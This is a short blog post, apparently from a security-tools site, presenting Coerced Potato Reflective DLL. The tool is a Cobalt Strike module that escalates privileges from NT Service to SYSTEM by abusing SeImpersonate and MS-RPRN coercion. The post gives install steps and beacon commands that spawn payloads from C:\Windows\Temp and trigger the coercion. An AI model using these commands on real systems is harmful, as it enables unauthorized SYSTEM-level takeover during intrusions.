Cyber security

Coerced Potato Reflective DLL – Unveiling Privilege Escalation From NT Service To SYSTEM

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily based

Reflective Loader from

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

Usage

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Leave a Comment
Share
Published by
Varshini
Tags: Coerced Potato Reflective DLLcybersecurityinformationsecuritykalilinuxkalilinuxtools
2 years ago

Recent Posts

Install TeamViewer on Ubuntu 26.04: Complete Setup Guide

If you need secure remote desktop access on Linux, learning how to Install TeamViewer on…

3 hours ago

Install VirtualBox Ubuntu 26.04 for Easy VM Setup

If you want to test operating systems, build development labs, or safely run isolated environments,…

6 hours ago

How to Install Node.js and npm on Ubuntu

If you want to build JavaScript applications on Linux, learning how to Install Node.js Ubuntu…

9 hours ago

How to Add APT Repositories on Ubuntu Safely

Managing software sources is an essential part of maintaining a Linux system, and understanding APT…

12 hours ago

How to Check Website for Malware and Protect Your Site

Website malware is one of the biggest threats for website owners, bloggers, businesses, and WordPress…

1 day ago

Install Python on Ubuntu 26.04 Like a Pro

If you want to Install Python on Ubuntu systems for development, automation, or scripting, Ubuntu…

1 day ago